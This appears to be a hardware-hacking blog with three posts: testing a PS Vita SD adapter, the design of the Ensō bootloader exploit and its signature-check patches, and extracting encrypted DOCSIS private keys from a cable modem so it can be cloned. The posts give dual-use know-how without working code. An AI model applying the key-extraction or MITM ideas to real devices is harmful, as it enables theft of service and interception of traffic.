Fortunately, the driver is pretty easy to create. The Vita already has drivers for USB storage (it’s used on PS TV safe mode for reinstalling firmware), but is normally disabled. A simple patch running on HENkaku Ensō enables it at boot and using The_FloW’s patches for mounting USB storage as a memory card, it all pretty much just works.

Testing

Next is an important part that I feel many ambitious project leaders skip–which is testing. I want some real-world usage data and more importantly, I want to know what the battery impact of my design is. This was the first hurdle I ran into. Initial results showed that the battery life lasted an hour less with psvsd installed when idle. Worse, the battery was consumed even when powered off (not lasting overnight). This is unacceptable for daily use. I took one of my breakout boards and re-purposed it to act as a current measurement harness by cutting the trace to the power input and attaching each end to an ammeter.

Then, I was able to measure the exact current consumption during various usage cases (read, write, idle, etc). Below is a video of some of these tests.

After testing the power usage of a couple of different USB devices and asking around on hardware forums, I found out the problem was two-fold. First, when the Vita is powered off, it does not power off the USB voltage line, but it does pull both USB data lines low. Unfortunately, this leaves the USB device in “reset” mode instead of “low power suspend” mode. Likely this wasn’t an issue for the 3G modem because it was a custom design meant only to pair with the Vita and has a separate power management IC that is smarter than just looking at the USB data lines. The second problem is that the USB2244 is a power hog of a chip. It draws an average and minimum of 100mA when not in “low power suspend” (which the Vita does not support) even if there is no activity on the SD card.

As a result, I had no choice but to go for an “cheap Asia manufactured chips” even though there was less documentation and support. Luckily I found some datasheets and reference schematics for GL823 online and was able to buy a couple of them to play with. I discovered that cheaper doesn’t always means lesser quality. Not only did the GL823 consume less power (only 30mA average and 1.5mA in “reset” mode) but it also outperformed the USB2244 in read and write speeds as well! Even better, the GL823 does not require an external crystal so I can remove some of the area footprint as well. I really should have chosen this chip to start with.

I also purchased a dedicated USB power tester at this point so I was able to get quick data measurements.

Because the extra hardware must be powered somehow, some dip in battery life is expected, but in the final design this dip is not noticeable at all.

What’s next?

In the end, I made five prototypes and a breakout adapter. Here’s a family photo along with the final product to the right.

Thanks to everyone who contributed to this project! There are more detailed posts (with more pictures) for each step in the process on the Indiegogo page for those who are interested. You can find the design on psvsd.henkaku.xyz. Since the design is open source and free for commercial use, I think someone will manufacture, sell, and support it. Here’s another free idea: buy a large number of < 3.60 firmware 3G motherboards (they are around $15-25 a piece on Aliexpress) and screws (M1.6x4mm flat-head no countersink) and bundle them together with a psvsd adapter and a microSD card to form a Vita hacking starter kit.

I don’t plan to mass produce this myself but I do have at most 50 extra units due to canceled orders and extra parts. As a result, I’ve decided to auction them off to those who most want one up until September 2017. You can find more information about that here.

HENkaku Ensō bootloader hack for Vita

2017-07-31T00:00:00-07:00

When we (molecule) were reverse engineering the Vita’s firmware years ago, one of the first vulnerabilities we found was in the bootloader. It was a particularly attractive vulnerability because it was early in boot (before ASLR and some other security features are properly initialized) and because it allowed patching the kernel before it booted (which expands what can be done with hacks). Unfortunately, the exploit required writing to the MBR of the internal storage, which requires kernel privileges. That means we would have to exploit the kernel (à la HENkaku) in order to install the exploit. (Before you ask, no it is not possible to install with a hardware mod because each Vita encrypts its NAND with a unique key. Also, there are no testpoints for the NAND, so flashing it is notoriously difficult… not as simple as the 3DS.) So, we mostly forgot about this vulnerability until quite recently when we finally all had some free time and decided to exploit it.

Vulnerability

The vulnerability is a buffer overflow due to the bootloader statically allocating a cache buffer for eMMC device reads using a constant block size of 512 bytes but when it actually loads the blocks into the cache, it uses the (user controlled) block-size field in the FAT partition header. We exploited it by overwriting a function pointer that exists after the cache buffer in the classic buffer overflow fashion. The vulnerability is relatively straightforward but we had to employ some tricks in exploiting it (especially in trying to debug the crash). xyz will talk about this in more detail in his blog post (TBD), I will focus more on what happens after we take control.

As far as we know, 3.61-3.65 are still vulnerable. However, as I’ve said in the beginning, you need a kernel exploit to modify the MBR (needed to exploit) as well as to dump the non-secure bootloader (to find the offsets to patch). Nobody in molecule is interested in hacking anything beyond 3.60 because Sony isn’t shipping any new consoles globally with newer firmware versions–anyone who wishes to run homebrew can choose not to update. However, if you’re already updated past 3.60 and you wish to run homebrew possibly in the future, my advice is to not update past 3.65 because someone else might find a new kernel exploit and allow you to install this hack on 3.65. Don’t hold your breath though. Anyone can dump and reverse the kernel code with HENkaku, so maybe there will be extra motivation for outsiders to find a new hack now.

Because 3.65 is still vulnerable, it is also possible for someone to build a custom updater for 3.60 that flashes 3.65 and HENkaku Ensō at the same time and use the same CFW (taiHEN) on 3.65. This would allow you to play new games blocked on 3.60. However, to do that, someone would have to dump the 3.65 non-secure bootloader in order to find the offsets and rebuild the exploit (which is open-source). Again, this requires, at the very least, a 3.65 kernel exploit (and perhaps another exploit as well because WebKit actually thrashes the memory that NSBL resides in and if you exploit kernel after WebKit runs, it’s too late to dump NSBL but I digress). Another way, perhaps insane, is to try to guess the offsets. The best case scenario is that none of the offsets changed (since 3.61-3.65 are all very minor updates). You can build custom hardware that tries different offsets and reset the device if it fails. Honestly though I think it would be easier to just find a new kernel exploit at that point.

Design

In creating Ensō, we had a couple of major design goals

Allow loading unsigned driver code as early as possible. This will enable a greater variety of hacks to be developed.
Support recovery in case of user error. We don’t want a bad plugin to brick the Vita.
Reuse as much of the current infrastructure as possible. taiHENkaku is tested and it works and we don’t want to fragment the already tiny homebrew ecosystem. Fortunately, taiHEN was designed with this use-case already in mind.

It is a bit tricky to meet all of these goals simultaneously. For example, if we want plugins to load before SceShell, then a bad plugin might ensure SceShell never loads and recovery not possible. If write a custom recovery menu, then we would also need to write custom graphics initialization code (for OLED, LCD, and HDMI) as well as code to handle the control pad and USB/DualShock 3 for the PS TV. All that custom code in a recovery menu would make recovery itself unstable, which defeats the purpose. On the other hand, if we take over Sony’s recovery mode, that loads very late in the boot process and might not be good enough to recover from bad kernel plugins. In the end, we decided to re-use as much of the functionalities that already exists as possible instead of implementing new ones. That way we do not have to rely on extensive testing and debugging of “CFW features” and instead rely on Sony’s firmware along with HENkaku to already be working. The new code that Ensō adds to the system is minimal. Less new code means less chances for something to go wrong and less effort required for testing.

Boot Process

Before discussing the design of Ensō, I should explain how Vita boots into its kernel. A description of the secure boot chain and the complete boot sequence can be found in the wiki. Here, instead I will zoom in and explain in more detail the last chain of the boot sequence: kernel loading in non-secure world.

The non-secure bootloader (henceforth: NSBL) has its own embedded version of the base kernel modules: SceSysmem, SceKernelThreadmgr, SceModulemgr, etc that it uses before the base modules are loaded. Using the internal loader, NSBL first instantiates a stub loader named os0:psp2bootconfig.skprx, which has hard coded paths to the base kernel modules along with the base driver modules (such as SceCtrl, SceSdif, SceMsif, etc). It also selects which display driver to load (SceOled, SceLcd, SceHdmi) and after the framebuffer manager (SceDisplay) is loaded, the boot logo shows up on non-PSTV models. The last module in this phase is SceSysstateMgr, which is responsible for migrating the NSBL state to the kernel (so, for example, SceModulemgr can take control of the modules loaded by the embedded NSBL loader). It then creates and switches to the kernel process (pid 0x10005), cleans up the pre-boot process, unmaps NSBL from memory, and loads the boot configuration script.

The boot configuration script syntax is documented on the wiki. It supports simple commands like load path.skprx to load a module and simple control flow such as if SAFE_MODE to only perform the proceeding commands if the console is booting to safe mode. The script is, of course, signed and encrypted and is different for PS TV (to load drivers for the DualShock 3, for example). The final command in the script is to spawn either the LiveArea process (SceShell) or the safe mode process (in safe mode) or the updater process (in update mode).

The diagram above is a summary of this process. Not mentioned is bootimage.skprx, which is an (encrypted & signed) archive of many of the kernel modules loaded by the boot script. I am not sure why some modules are in this boot image while others are stored as files on the os0 partition but I don’t think there is a reason. The arrow indicates boot order dependency. The blue boxes, as detailed below, are what gets patched by Ensō.

Taking Over Boot

The exploit allows us to control code execution in the non-secure bootloader, so our job is to maintain control while allowing the rest of the system to boot. If you look at the diagram again, you can see that there are three stages of boot before the kernel is completely loaded. The first stage is NSBL, which we control from the exploit. The second stage is loading the base kernel and drivers using the loader inside NSBL. One module in the base kernel is authmgr.skprx, which does the decryption and signature checks for any code loaded by the kernel. The first patch we make is to disable these checks for unsigned code. Next, we want to make sure taihen.skprx and henkaku.skprx are loaded at boot. The perfect place for this is in the boot configuration script. So the next patch is in sysstatemgr.skprx to support loading a custom (unsigned) script. Finally, we append load ur0:tai/taihen.skprx and load ur0:tai/henkaku.skprx into the custom script and this should load our unsigned modules at boot.

There’s a couple of other minor details though. We want a custom boot logo because that is the table dressing that all custom firmwares have. To do this, we simply patch display.skprx when it is loaded by NSBL. Next, we need to ensure that our MBR modifications to trigger the exploit does not break the kernel. This requires us to patch the eMMC block device driver at sdif.skprx where we redirect reads of block 0 to block 1 where the Ensō installer has stored a copy of a valid MBR. With these patches in place, we can start taiHENkaku on boot. As a bonus, because we can modify the boot script, we can also enable certain features such as the USB mass storage driver on handheld Vitas.

Recovery

Hacking the system early in boot is very dangerous because errors may result in a bricked system. There are two potential problems that arises. First, because we load an unsigned boot script, if the script is corrupted either by user error or other means, then the system will not boot. The Vita has a built-in “safe mode” but that depends on a valid boot script. Second, if there is a bug in taihen.skprx or henkaku.skprx, the module might crash the system before the user has a chance to update the files. The solution we decided is to disable (almost) all patches if the Vita is booting into safe mode (either by holding R+PS button during boot or by removing the battery during boot and plugging it back in). The only patch we can’t disable is the one in sdif.skprx (marked in cyan in the diagram above) because that patch ensures our exploit MBR does not mess up the kernel. As a consequence of disabling the patches, the default (signed & encrypted) boot script is loaded as well as the safe mode menu.

Since we store all the hack files in ur0: (the user data partition), if user selects the reset option from safe mode, it will delete the (corrupted) custom boot script as well as taiHENkaku. Then when they reboot back into normal mode, the patched sysstatemgr.skprx will see that the custom boot script is not found and fall back to the default boot script. The user can then install HENkaku from the web browser and reinstall a working boot script using the Ensō installer.

We also provide another layer of recovery. If you attempt to reinstall the 3.60 firmware from safe-mode, this should remove the Ensō hack as well. This works because the updater will always change the MBR, so because our block 0 read patch redirects block 0 to block 1 but does not redirect writes to block 1, the updater will read the valid MBR and then update it and try to write it back to block 0 where it will wipe the hacked MBR. This also ensures that if a user accidentally updates to, say, 3.65, it will make sure Ensō is wiped otherwise the user will have a permanent brick. Of course, the Vita will no longer run homebrew, but that’s still better than a brick.

All this means that as long as the user does not modify the hack sectors in the eMMC or modify the os0 partition, they would be able to recover from any mistake. The Vita mounts os0 as read-only by default so there is no chance for an accidental write there. Additionally, with the custom boot script, the hackers will never have a need to modify os0 when they can instead boot modules from other partitions such as ur0.

Testing

The last and most important step in this journey is to make sure the design is properly tested. Because of the recovery mechanisms, as long as the installer works and the sdif.skprx patch works, any other error can be recoverable. As much as we can test internally, we do not have enough devices and configurations to cover the wide variety of hacked Vitas out there. That’s why I asked members of the hacking community to potentially sacrifice their Vitas in testing the hack months before the release. As long as the testers are willing to take the risk of a bricked Vita, they can be on the “front line” in installing and using the hack. If anything wrong happens, they will let us know and we will catch the bug before it goes out to the masses. I created a sign-up and made sure the risks of being the first to run such a hack is explicit. After opening sign-ups for a day, I got 160 responses back. From those responses, I invited 10 people a day for 10 days to participate in the beta.

Test Guide

To facilitate the test process, I wrote a guide that testers can follow along to install, uninstall, and recover Ensō. I asked testers to video record the entire process in case anything goes wrong and to send us the video if it does go wrong. Because the test requires following precise instructions, I wanted to filter out candidates who either do not have the necessary English skills to understand the instructions or are too careless to follow them. That way, I can be more confident in the collected data and that, for example, nobody is just answering yes to everything. Additionally, for their own good, I didn’t want to allow people who just saw the word “beta” and ignored all my warnings to run the beta builds. I wanted to make sure that the participant fully understands the risk they are taking on and consent to it. To do this, I added a simple reading test at the beginning of the guide.

and at the end of the page

Not surprisingly, a good number of people failed the reading test on their first try. After passing it, the guide went through 7 scenarios including installation, fallback when HENkaku is not installed, fallback when custom boot script is not found, uninstallation, safe mode, and recovering from bad boot scripts.

Results

Out of about 100 invited testers, 67 completed the test guide (including passing the reading test which filtered out many people). The testers were broken into 10 groups assigned daily to ensure each new build has been tested.

Out of the 67 testers, we had a good distribution of devices tested with.

There were only two permanent bricks. They were the first two testers on the very first build. We quickly identified the issue and fixed it and there were no more bricks for the remainder of the test. There were also two testers who suffered non-fatal installation failures.

All in all, most testers reported no issues with any of the test scenarios. However, there were some common hurdles that we have addressed thanks to the feedback.

When booting into SceShell with version spoofing, the Vita writes the “current” firmware version into id.dat on the memory card. This “feature” is to prevent users from taking a memory card from a Vita running the latest firmware and moving it to a Vita running a previous firmware. However, once you uninstall Ensō, this “feature” is triggered causing the Vita to reject the memory card unless it is formatted. To address this, HENkaku R9 disables the id.dat write.
If the user switches their memory card and the memory card has an older version of HENkaku installed, it might crash SceShell and the only way to use the memory card is to format it to delete the older HENkaku files. To address this, HENkaku R10 installs everything to ur0 which is the built in system memory.

Thanks

Thanks to all our testers for taking the risk and helping us improve the installation process and fix many bugs. Thanks to motoharu for his wiki contributions that sped up the development of the eMMC block redirection patch. Big, big thanks to @NickLS1 for proving us with hard-modded Vitas to test and develop with. Thanks to all our friends who knew about the exploit and kept it under wrap at my request because we knew Sony hadn’t patched it yet at the time.

If you want to take a look at the source, it is up on Github. Please don’t try building and installing your own build unless you are absolutely sure of what you’re doing. Any minor mistake will result in a unrecoverable brick.

Modem Cloning for Fun (but NOT for profit!)

2017-04-02T00:00:00-07:00

Recently, I stumbled upon an old cable modem sitting next to the dumpster. An neighbor just moved out and they threw away boxes of old junk. I was excited because the modem is much better than the one I currently use and has fancy features like built in 5GHz WiFi and DOCSIS 3.0 support. When I called my Internet service provider to activate it though, they told me that the modem was tied to another account likely because the neighbors did not deactivate the device before throwing it away. The technician doesn’t have access to their account so I would have to either wait for it to be inactive or somehow find them and somehow convince them to help me set up the modem they threw away.

But hackers always find a third option. I thought I could just reprogram the MAC address and activate it without issue. Modems/routers are infamously easy to hack because they always have outdated software and unprotected hardware. Almost every reverse engineering blog has a post on hacking some router at some point and every hardware hacking “training camp” works on a NETGEAR or Linksys unit. So this post will be my rite of passage into writing a “real” hardware hacking blog.

BPI+

Getting access to a shell was laughably easy so I won’t even go into details. In short, I Googled the FCC ID found on the sticker and found the full schematics for the board along with part numbers of all the chips (such information is required in the FCC approval process but most companies request that it be kept confidential). Through the schematics, I found the UART console, which was nicely exposed through some unfilled port. In fact, I did too much work here because after opening the device up, I found the word “CONSOLE” printed on the solder mask right next to those ports. After soldering some headers to it, I was able to connect it to my Raspberry Pi and enter the root shell without needing any password. The whole process took about an hour–the most time being trying to physically open the plastic shell because (and this may be surprising) hackers are not the epitome of physical strength.

Once I got a shell, I dumped the flash memory and I grepped for the MAC address printed on the label (trying hex, ASCII, and different separators). I found a file in a partition labeled NVRAM containing the MAC address. The file does not appear to have any checksums, so I just replaced it with a new MAC, rebooted and… nothing. The modem refused to establish a connection. That’s when the real work started…

The first clue was looking around in the NVRAM partition and finding a set of certificates signed for the modem’s MAC address. Googling “DOCSIS certificate” led me down the rabbit hole of modem cloning, service stealing, bandwidth unlocking, and so on. I learned about how not too long ago, people would modify their modem configuration files in order to unlock higher speeds than what they paid for (if anything at all). As ISPs clamped down and secured their infrastructure, the hackers moved on to “cloning” modems by finding the MAC address of an existing subscriber and reprogramming their modem to use the same MAC address in order to steal service. As a result of all this, the DOCSIS 1.1 specification established a PKI system of validation for MAC addresses.

First, I generated a set of self-signed certificates for my new MAC address. Surprisingly, I was able to provision the modem and my ISP accepted the certificate and gave me an IP address. Unfortunately, I was not able to access the Internet and even using my old router’s MAC address did not work. My guess is that self-signed certificated are used by engineers to test the network and therefore do not allow access to the Internet. It likely also has to do with protections against “simple” cloning. Now my plan is to get a new set of certificates from an unactivated device. I went on eBay and bought a broken SurfBoard SBG6580. The reason for this model is purely because it was the cheapest one I could find. Since it was broken, it is more likely that it’s deactivated.

Dumping SBG6580

Unfortunately, the FCC does not have the schematics for this device public but a quick inspection showed that the chip labeled Spansion FL128SAIF00 is a 16MiB SPI based flash memory with the datasheet being easily available online. Being a TSOP chip, it is easy enough to solder wires to and luckily I remembered NORway from back when I downgraded my PS3 and that it has SPI dumping support. I connected the Teensy2++ and patched in support for detecting this chip.

binwalk was able to find some embedded certificates

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
67322         0x106FA         Certificate in DER format (x509 v3), header length: 4, sequence length: 803
68131         0x10A23         Certificate in DER format (x509 v3), header length: 4, sequence length: 1024
70249         0x11269         Certificate in DER format (x509 v3), header length: 4, sequence length: 808
71063         0x11597         Certificate in DER format (x509 v3), header length: 4, sequence length: 988
83445         0x145F5         Certificate in DER format (x509 v3), header length: 4, sequence length: 866
84317         0x1495D         Certificate in DER format (x509 v3), header length: 4, sequence length: 983
85306         0x14D3A         Certificate in DER format (x509 v3), header length: 4, sequence length: 864
100090        0x186FA         Certificate in DER format (x509 v3), header length: 4, sequence length: 803
100899        0x18A23         Certificate in DER format (x509 v3), header length: 4, sequence length: 1024
103017        0x19269         Certificate in DER format (x509 v3), header length: 4, sequence length: 808
103831        0x19597         Certificate in DER format (x509 v3), header length: 4, sequence length: 988
116213        0x1C5F5         Certificate in DER format (x509 v3), header length: 4, sequence length: 866
117085        0x1C95D         Certificate in DER format (x509 v3), header length: 4, sequence length: 983
118074        0x1CD3A         Certificate in DER format (x509 v3), header length: 4, sequence length: 864
131164        0x2005C         LZMA compressed data, properties: 0x5D, dictionary size: 16777216 bytes, uncompressed size: 2898643604054482944 bytes
8388700       0x80005C        LZMA compressed data, properties: 0x5D, dictionary size: 16777216 bytes, uncompressed size: 2898643604054482944 bytes

This includes DOCSIS BPI+ certificates for both US and European regions as well as code signing certificates and root certificates. But unfortunately, no private keys. From experience, it seems likely that the private keys would be stored close to the public keys, so I looked in the hex dump for possible candidates. There were blobs of random looking data in between some of the certificates. It also appears that before each certificate is a two-byte length of the DER file. So I was able to parse the NV storage to dump the certificates, some plaintext setting and device information, as well as 0x2A0 sized blobs of data I previously saw. This data can’t be the private exponent of the RSA key because it is too large. It also does not appear to contain any structure, so it can’t have any CRT component of a key. My hypothesis was that it’s an encrypted PKCS#8 RSA private key in DER format. The evidence was that the file size was aligned to an encryption block, that my other modem used PKCS#8 in DER, and that PKCS#8 DER of an RSA1024 key is about 0x279 bytes, which is suspiciously close to 0x2A0 (for comparison, PEM encoded keys are at least 0x394 bytes and PKCS#1 in DER is almost 1KB because of the extra factors).

Reversing the Firmware

With that in mind, there is no way around having to reverse the firmware. The last two entries in binwalk showed two large compressed chunks, which is a good start. I found another hacker has dealt with this kind of compression before and the trick was that the header was non-standard (it lacked a valid uncompressed size field). Googling the CPU gave this wiki which asserts that the architecture is big endian MIPS. There were many references to 0x8000.... in the firmware and nothing to 0x7fff...., so I assumed the load address was 0x80000000. Of course, the load address was incorrect but rather than spending time reversing the bootloader, I instead assumed that the load address was page-aligned (because what sane programmer who isn’t thinking about security wouldn’t) and found a random pointer from the code into the large section of strings and incremented the pointer by 0x1000 until I found a string that started at that address. The load address was 0x80004000.

Thankfully there are enough debug strings to narrow down the search for the decryption routine in the 16MiB firmware. By looking for terms like “decrypt” and “bpi” and “private”, I was able to find a function that prints out ******** Private Key Source is ENCRYPTED. (%d BytesUsed)\n as well as @@@@@@@@@ des3ABC_CBC_decrypt() failed @@@@@@@. Seems pretty promising.

From the debug printf, it’s obvious that some blob of data is passed to a function called des3ABC_CBC_decrypt. I assume this means 3DES EDE with a 3-key config. The input key is 21 bytes which is non-standard. Turns out there’s a simple key derivation process (yay security by obscurity) that involves shuffling the key bytes, and subtracting the index from each byte. Then the 21 byte key, which is 8 groups of 7 bits is transformed into the standard representation of 8 groups of 8 bits where each group has a parity check. I’ve included the reversed code below.

With the correct key, I was able to decrypt the 0x2A0 blob which turned out to be (as I suspected) a DER encoded PKCS#8 RSA private key along with a SHA1 hash to authenticate the encryption.

At last

It was a fun journey, but out of caution, I will not be actually using this modem. Cloning MACs is too much intertwined with stealing internet service and although it is not something I ever intend to do, I do not want there to be any confusions between me, the government, and Big ISP. As a result, it was just a fun exercise. As a word of advice to the reader, many people have been arrested for hacking modems. This site does not condone or promote any illegal activities and this post is presented only for education purposes and is more about reversing hardware then it is about bypassing restrictions.

Other Notes

Here’s some “fun facts” I’ve gathered on my journey.

Some modems have backdoors for your ISP (usually technician and customer service agents) to log in to. The modem I looked at had a SSH server that is not visible on the LAN (your devices <-> your modem) or WAN (your modem <-> Internet) but is visible to the CMTS (your modem <-> your ISP). This is enforced by iptables. They also have a separate username/password to the router gateway page with a weak password that you cannot change. This login works from LAN and WAN as well if you enable remote management.
EAE (early authentication and encryption) is a feature in DOCSIS 3.0 that allows an encrypted connection to be established early on. My ISP (one of the top ISPs in America) has this disabled even for DOCSIS 3.0 routers that support it. The CM config file contains information on your service plan, your upstream/downstream limits, your bandwidth usage, and more. This is sent unencrypted along with the DHCP request to establish an IP address.
Because of the above, it might be possible to perform a MITM attack on neighbors through DHCP.
DOCSIS 3.0 provides the ability to use AES-128 per-session traffic encryption but my ISP (again one of the top ISPs in America so I doubt other ISPs differ in this) chooses instead to use DES (not 3DES by the way) with 56-bit keys (since they still support DOCSIS 2.0). Note that an attack was presented in 2015 by using rainbow tables to make cracking DOCSIS traffic trivial. Reading the service agreement with my ISP, it seems that they concede to this and declared that there is no expectation of privacy with their service. I guess a legal fix is much easier than a technical one.